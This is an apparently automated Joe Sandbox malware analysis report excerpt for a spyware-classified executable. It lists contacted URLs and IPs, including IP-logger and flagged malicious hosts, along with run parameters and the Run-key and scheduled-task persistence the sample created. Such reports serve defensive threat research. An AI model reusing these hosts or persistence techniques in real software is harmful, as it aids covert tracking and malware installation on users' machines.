                                          https://counter.yadro.ru/hit?ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.chameleon-managers.com/reg.php?program=ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.chameleon-managers.comQNcexplorer.exe, 00000001.00000003.1945646507.00000000021C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.myexternalip.com/rawETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.chameleon-managers.comHChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.chameleon-managers.com3tcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.chameleon-managers.comsKcexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://counter-strike.com.ua/cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.chameleon-managers.com/subscription/?action=latest&key=ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://neosoft-activator.appspot.com/vBChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://bot.whatismyipaddress.comETVk1yP43q.exe, 00000000.00000003.1777304241.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783534951.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755919665.000000000497D000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756224938.000000000497D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.palkornel.hu/innosetup%1cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.chameleon-managers.com3_lmPlmPcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.chameleon-managers.comcexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1929110914.0000000006261000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.chameleon-managers.comScexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;zETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://iplogger.org/privacy/ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.innosetup.com/cexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drfalse
                                                      high
                                                      https://2no.co/redirect-ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.chameleon-managers.com/contacts.php?program=ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://ocsp.thawte.com0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                        high
                                                        http://www.chameleon-managers.com3Y4=A4=AhXInnocexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.startssl.com/sca-code2.crl0#cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                          high
                                                          http://ocsp.startssl.com07cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.chameleon-managers.com3jcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdn.iplogger.org/favicon.icoETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://92.63.192.63/index.phpvupdate.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.chameleon-managers.com3hcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://checkip.dyndns.orgETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.startssl.com/policy0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                              high
                                                              http://www.chameleon-managers.com3lcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://ocsp.startssl.com00cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=ChameleonExplorer.exe, 00000004.00000000.1746141288.0000000000429000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3ccexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3fcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3gcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://2no.co/1dHC37BETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.chameleon-managers.com3cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3dcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.chameleon-managers.com3ecexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.dk-soft.org/cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://92.63.192.63/index.html_update.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2470147501.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://92.63.192.63/index.htmlbupdate.exe, 00000015.00000002.2483935326.000000000075A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2482146112.000000000075A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://2no.co:443/1dHC37UsersETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004B84000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778548734.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796667122.0000000004B85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://92.63.192.63/index.phpmswsock.dll.muiupdate.exe, 00000015.00000003.2482146112.0000000000772000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.startssl.com/policy0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                                  high
                                                                  http://aia.startssl.com/certs/ca.crt0cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                                    high
                                                                    http://www.chameleon-managers.comSQcexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.chameleon-managers.com/0cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.startssl.com/0Qcexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drfalse
                                                                      high
                                                                      https://iplogger.org/rules/ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.remobjects.com/pscexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drfalse
                                                                          high
                                                                          http://92.63.192.63/index.phpMupdate.exe, 00000015.00000003.2482146112.000000000078A000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000002.2483935326.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.chameleon-managers.com3V$mP$mPcexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://2no.co/ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796709623.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778470634.0000000004BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://crl.uETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.79.229
                                                                          2no.coUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          92.63.192.63
                                                                          unknownRussian Federation
                                                                          44636ITDELUXE-ASRUtrue
                                                                          172.217.16.212
                                                                          neosoft-activator.appspot.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.185.115
                                                                          ghs.googlehosted.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1583137
                                                                          Start date and time:2025-01-02 02:26:07 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 10m 15s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:25
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:ETVk1yP43q.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:56ecf4355112dcd2f73e04d0d1784178.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.spyw.evad.winEXE@29/46@3/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 92.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 61%
                                                                          • Number of executed functions: 152
                                                                          • Number of non-executed functions: 113
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target ChameleonFolder.exe, PID 5776 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          01:27:18Task SchedulerRun new task: Chameleon Folder-user path: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                          01:27:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                          01:27:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                          01:27:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                          01:27:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                          20:27:08API Interceptor2x Sleep call for process: ETVk1yP43q.exe modified
